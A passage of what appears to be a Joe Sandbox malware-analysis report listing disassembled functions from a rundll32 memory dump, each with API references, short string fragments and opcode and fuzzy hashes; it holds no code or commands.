                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f238ee4681994a5d1c0a1d2ccda0e1486daa33646f2f510f1d8fedc283540098
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CD0126207083804FE716A739982096E3BE29FC711035844EED085CF7A2DA19EC07C366
                                                                                                                                                                                                                                                                            Function 06F19FE0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 06F19FF8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449324041.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_6f10000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                                                                                                                            • Opcode ID: cf1fa6e78ee088a201aaf4c9cf9a10386780341a849a4af58acddcb122f3c04f
                                                                                                                                                                                                                                                                            • Instruction ID: 6cd9155baa2c25a23b97f696e6580a89899aa8004562e8c9096cc409381a5d51
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf1fa6e78ee088a201aaf4c9cf9a10386780341a849a4af58acddcb122f3c04f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51115C36E023049FDF54CA78D4503FCBBB5EB883B8F149125D515AB290DB36AC09CB50
                                                                                                                                                                                                                                                                            Function 06F19FD0 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • KiUserExceptionDispatcher.NTDLL ref: 06F19FF8
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449324041.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_6f10000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 6842923-0
                                                                                                                                                                                                                                                                            • Opcode ID: 0c79ba674d522f39ef3ca3f294c00a70bc8b1bd60e6f9025c99d7753d2b7356c
                                                                                                                                                                                                                                                                            • Instruction ID: 8fa2a9240fd2e900f4cda6b79ac7028b55146b53e6cc2c5ad8c68037ddfe1a33
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c79ba674d522f39ef3ca3f294c00a70bc8b1bd60e6f9025c99d7753d2b7356c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2117B31E033449FEB54CA38C8547FDBBA5DB493B8F149168D8156B290DB36AC49CBA0
                                                                                                                                                                                                                                                                            Function 04AC1080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: c7ee37dbb9b4ecfcd326a2e00f555b242ae1184219b189485fce8d946acd702c
                                                                                                                                                                                                                                                                            • Instruction ID: 5d3810a63a191f80ee3838c85d5e3da60a5210d478507cd231482775f96ca904
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c7ee37dbb9b4ecfcd326a2e00f555b242ae1184219b189485fce8d946acd702c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D718535F002149FEB54ABB5C8547AEBAA7EFC8210F14802DE506EB365DE35EC029B91
                                                                                                                                                                                                                                                                            Function 04AC68E0 Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 5ff57ec72bd4b7e3ccb02c2a23007442361dcc0588f531cd62853b0e31a1bd3e
                                                                                                                                                                                                                                                                            • Instruction ID: 7fc378f6a811032308357b45edb341a72c821f90debfae1c7e32e6d26c3dd928
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ff57ec72bd4b7e3ccb02c2a23007442361dcc0588f531cd62853b0e31a1bd3e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D1613A7AB002059FDB11CF69D88099ABBF6FF8D31071481AAE919DB321D731ED16DB90
                                                                                                                                                                                                                                                                            Function 04AC0E8C Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: c91bc87fe4b1931c4b1a78349962564cf7b3271e2adec41eec61b3e95d97558d
                                                                                                                                                                                                                                                                            • Instruction ID: 5b08415a104171bd95f1c8d4f2e7ecd4562e9f6b950421a9147a159bfee39dde
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c91bc87fe4b1931c4b1a78349962564cf7b3271e2adec41eec61b3e95d97558d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9041E931F002045BFB58A7A9D46176E77A6DFC8210F54812ED906EB381CE35AC0787D5
                                                                                                                                                                                                                                                                            Function 04AC34A8 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: __BackingField
                                                                                                                                                                                                                                                                            • API String ID: 0-2062551806
                                                                                                                                                                                                                                                                            • Opcode ID: 8e8f7c74cc3e22b9287be5fcd14d707efa814ec2fb3e26e0ce9c770bb447ab2b
                                                                                                                                                                                                                                                                            • Instruction ID: ad345447464ba7b73dbf188de113f9d25ff92c8255c5c3a32dda2240c9fb12e1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e8f7c74cc3e22b9287be5fcd14d707efa814ec2fb3e26e0ce9c770bb447ab2b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3515D38B013055FDB09EB28E591A6EFBA3EBC42017109669E5059B358DF70FD0B8BD1
                                                                                                                                                                                                                                                                            Function 04AC34B8 Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: __BackingField
                                                                                                                                                                                                                                                                            • API String ID: 0-2062551806
                                                                                                                                                                                                                                                                            • Opcode ID: d7755c8819161213ca01840042e9d50c55ada694ecbdd0625273a77b25d90bd6
                                                                                                                                                                                                                                                                            • Instruction ID: 3fe7db468c02639a809d781bd0ba3ed15f1af09c46cc955ae20fc332eb4aa74e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d7755c8819161213ca01840042e9d50c55ada694ecbdd0625273a77b25d90bd6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93516D38B013055FDB08EB68E591A6EFBA3EBC4201B009669E5059B358DF70FD0B8BC1
                                                                                                                                                                                                                                                                            Function 04ACE428 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (Aq
                                                                                                                                                                                                                                                                            • API String ID: 0-165228061
                                                                                                                                                                                                                                                                            • Opcode ID: bc9178d0a303f8c5032dec8f91a16f9d7a8de413ad9067a9afbac1d379ad49b7
                                                                                                                                                                                                                                                                            • Instruction ID: 754996e5437404b71449f0ddc22a30e08723e320ce696d657be9c7b8ee962365
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc9178d0a303f8c5032dec8f91a16f9d7a8de413ad9067a9afbac1d379ad49b7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 43414D70B102159FDB58DF69D855AAEBBB6FF88204F144129E406AB390EF74AC02CB91
                                                                                                                                                                                                                                                                            Function 04AC85B0 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: (q
                                                                                                                                                                                                                                                                            • API String ID: 0-2414175341
                                                                                                                                                                                                                                                                            • Opcode ID: 71d739323149250ad7461f645416e248b86cfa67aaeae90c7b86c8dfd6a902fb
                                                                                                                                                                                                                                                                            • Instruction ID: b102236da9f827b1ac8ed6ffb4f1b509a796ca96bad9395c88ed0f3f593e23a9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71d739323149250ad7461f645416e248b86cfa67aaeae90c7b86c8dfd6a902fb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0418B34A006048FDB54DF29C480A6ABBF2FF89355B15C96DE41AAB751DB34F841CB94
                                                                                                                                                                                                                                                                            Function 04AC3719 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: LRq
                                                                                                                                                                                                                                                                            • API String ID: 0-3187445251
                                                                                                                                                                                                                                                                            • Opcode ID: 0dc4c2eb1b23e8753ee065c5ce78b1a49334466cf2b3ae16fb9f697d6d5a7700
                                                                                                                                                                                                                                                                            • Instruction ID: 4dff93d24b1f9fb6d8c31bf91ebe7a26ff62feccef70c7cb2a4e4b139879662f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0dc4c2eb1b23e8753ee065c5ce78b1a49334466cf2b3ae16fb9f697d6d5a7700
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0721D1B1B042059FEF88DF68984577F7BBAEF85608F14806DE806C7291EF34E8068791
                                                                                                                                                                                                                                                                            Function 04AC4EB2 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: 4'q
                                                                                                                                                                                                                                                                            • API String ID: 0-1807707664
                                                                                                                                                                                                                                                                            • Opcode ID: b585126c41dacae439abbbe42e98b34363f17dfc2a4e83332af4ab580a6a5127
                                                                                                                                                                                                                                                                            • Instruction ID: 22b563329d67aa787c23d383af34aa1eda400afe7c5311921a27b95240f18547
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b585126c41dacae439abbbe42e98b34363f17dfc2a4e83332af4ab580a6a5127
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5315C35B002199FDB14DF69D890A9EBBB2BF88204B15859AE8149F256DB30F906CBD1
                                                                                                                                                                                                                                                                            Function 04ACAF10 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: \;q
                                                                                                                                                                                                                                                                            • API String ID: 0-705206692
                                                                                                                                                                                                                                                                            • Opcode ID: cd226139211e5cdf8a7d14b607b1341f04379eddde2aa658667a46b166e7aa23
                                                                                                                                                                                                                                                                            • Instruction ID: f341334d59cb6c3e49135c6c33b910b50f6bfc3d29b95829a501a7d96f772cfa
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd226139211e5cdf8a7d14b607b1341f04379eddde2aa658667a46b166e7aa23
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B1151317042054FAB649BAEA484A6BB7DAEFC8265314802BF50DC7754EE71EC014290
                                                                                                                                                                                                                                                                            Function 04AC5F38 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: LRq
                                                                                                                                                                                                                                                                            • API String ID: 0-3187445251
                                                                                                                                                                                                                                                                            • Opcode ID: 4f1dcd32aed98d927d2c8b287681d6b0c7f039cb3ac90bbcf7bebaad7f266e11
                                                                                                                                                                                                                                                                            • Instruction ID: c46d5396c7f8367d4e585db3ea81996ad2a0fdf6b557cf9aa349034e2c005c2c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f1dcd32aed98d927d2c8b287681d6b0c7f039cb3ac90bbcf7bebaad7f266e11
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F217C30B102189FDB589F69D459AAEBBF6EF88614F10805EF802A7390DF71AD018F94
                                                                                                                                                                                                                                                                            Function 04AC5F48 Relevance: 1.3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: LRq
                                                                                                                                                                                                                                                                            • API String ID: 0-3187445251
                                                                                                                                                                                                                                                                            • Opcode ID: d6b25541f1bbbb1741b02a414254e514a82e9d489aafd3843abfae40ab8fcab3
                                                                                                                                                                                                                                                                            • Instruction ID: 24c579f2c143c2c2f9c5bc5a520bd0ad88c1eae63519c1887b2e61dfb05555d3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6b25541f1bbbb1741b02a414254e514a82e9d489aafd3843abfae40ab8fcab3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F215B30B001189FDB589B69C455AAEBBF6EF88610F14805EF902A73A0DEB0AC018B94
                                                                                                                                                                                                                                                                            Function 04AC3370 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: fq
                                                                                                                                                                                                                                                                            • API String ID: 0-2523619172
                                                                                                                                                                                                                                                                            • Opcode ID: 9f0ea52ab7501ad5c528d8442472a64829c42269df56f2e6db2f7d8184340b29
                                                                                                                                                                                                                                                                            • Instruction ID: 8dbe25aee4a76988a747e7bc68a7f5d68350490772902a905619aef4f7a05871
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f0ea52ab7501ad5c528d8442472a64829c42269df56f2e6db2f7d8184340b29
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4F11A775B012145FDB499B799845ABFBFBAFB88341B10802AF905D7340DE35AD079B90
                                                                                                                                                                                                                                                                            Function 04AC3380 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: fq
                                                                                                                                                                                                                                                                            • API String ID: 0-2523619172
                                                                                                                                                                                                                                                                            • Opcode ID: 643e7405a8c4f706ace23da4aad0988880d250dcbc159699bd2c31b8e6f30331
                                                                                                                                                                                                                                                                            • Instruction ID: 0c0a32c23009548966d8dd4700167bb08e134f6f8fb36f907329e3c32dadb915
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 643e7405a8c4f706ace23da4aad0988880d250dcbc159699bd2c31b8e6f30331
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40115275B012145FCB489FA99845A7FBFAAFB88711F00802AFA05D7340DE355D029B91
                                                                                                                                                                                                                                                                            Function 04AC182B Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: uctorAsync
                                                                                                                                                                                                                                                                            • API String ID: 0-3992375288
                                                                                                                                                                                                                                                                            • Opcode ID: 4ac56d55d38d3898db7f69402408c4e8412a5ad66a49a39d853cad24a0e0735a
                                                                                                                                                                                                                                                                            • Instruction ID: c1cb81e11babc4c4a2524cd1968e7a59305bff2e09f8ec8140e25f84ac14c684
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ac56d55d38d3898db7f69402408c4e8412a5ad66a49a39d853cad24a0e0735a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9401A231B0420997FB58AA6885957EF7BF69BC8704F10406DD402B7381CE716C029B91
                                                                                                                                                                                                                                                                            Function 04ACA369 Relevance: 1.3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: eld
                                                                                                                                                                                                                                                                            • API String ID: 0-852119859
                                                                                                                                                                                                                                                                            • Opcode ID: 1ee2acf7aa9b5c6e3ea100bca177415bf93dae3b05562d2771ede53b9e018695
                                                                                                                                                                                                                                                                            • Instruction ID: 90dc1aa250d9a34a38ca7c2dac00e59079a008a9f96b127a6ec0fa15badcefa7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ee2acf7aa9b5c6e3ea100bca177415bf93dae3b05562d2771ede53b9e018695
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0F0E9257493544FE7191778881815D7F62DB8552832882AED44A9B796CE22DC438395
                                                                                                                                                                                                                                                                            Function 04AC2998 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Field
                                                                                                                                                                                                                                                                            • API String ID: 0-2587126364
                                                                                                                                                                                                                                                                            • Opcode ID: 354c21291c5a65faf770f5a832cb420a33a599c7ac54c6c452c73180af32bcf1
                                                                                                                                                                                                                                                                            • Instruction ID: 83ff63e832346102f95a290496a2baf20646f14465f170c664f4a30a8e3796be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 354c21291c5a65faf770f5a832cb420a33a599c7ac54c6c452c73180af32bcf1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BE0DF70A063006FF3216330E8537C57B21EB85208F01809BE1419F5A2CE51BC0B43C6
                                                                                                                                                                                                                                                                            Function 04AC15C0 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Async>d__99
                                                                                                                                                                                                                                                                            • API String ID: 0-3050118332
                                                                                                                                                                                                                                                                            • Opcode ID: 4cdf1c95a044a8350b2acda988669c19480adb4533a6705e85843e9836b856ad
                                                                                                                                                                                                                                                                            • Instruction ID: 1207322918b25b8383ea9c252a2c6bcc6908e7a94e0ef8b7c5256ca60056487c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cdf1c95a044a8350b2acda988669c19480adb4533a6705e85843e9836b856ad
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10D0C232B003146FD718AAB99800A9A7FD9DE40161700406E980ADB240EE35E9404390
                                                                                                                                                                                                                                                                            Function 04AC99A8 Relevance: .3, Instructions: 299COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_3_4ac0000_rundll32.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: e40e02eec92b3d75f569773802afbf30d5f80c3c6d8e9d8bc784a64d7bc747b8
                                                                                                                                                                                                                                                                            • Instruction ID: e6fb56ccd71bf0f295f4bedbe99364a1104dc0f5f29c95ebb070bdcb0f601701
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e40e02eec92b3d75f569773802afbf30d5f80c3c6d8e9d8bc784a64d7bc747b8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2D13974A003598FDB55CFA8C988A9DBBF6FF89300F148199D808AF265DB74ED46CB50
                                                                                                                                                                                                                                                                            Function 04ACBE40 Relevance: .3, Instructions: 273COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000005.00000003.1449292669.0000000004AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AC0000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
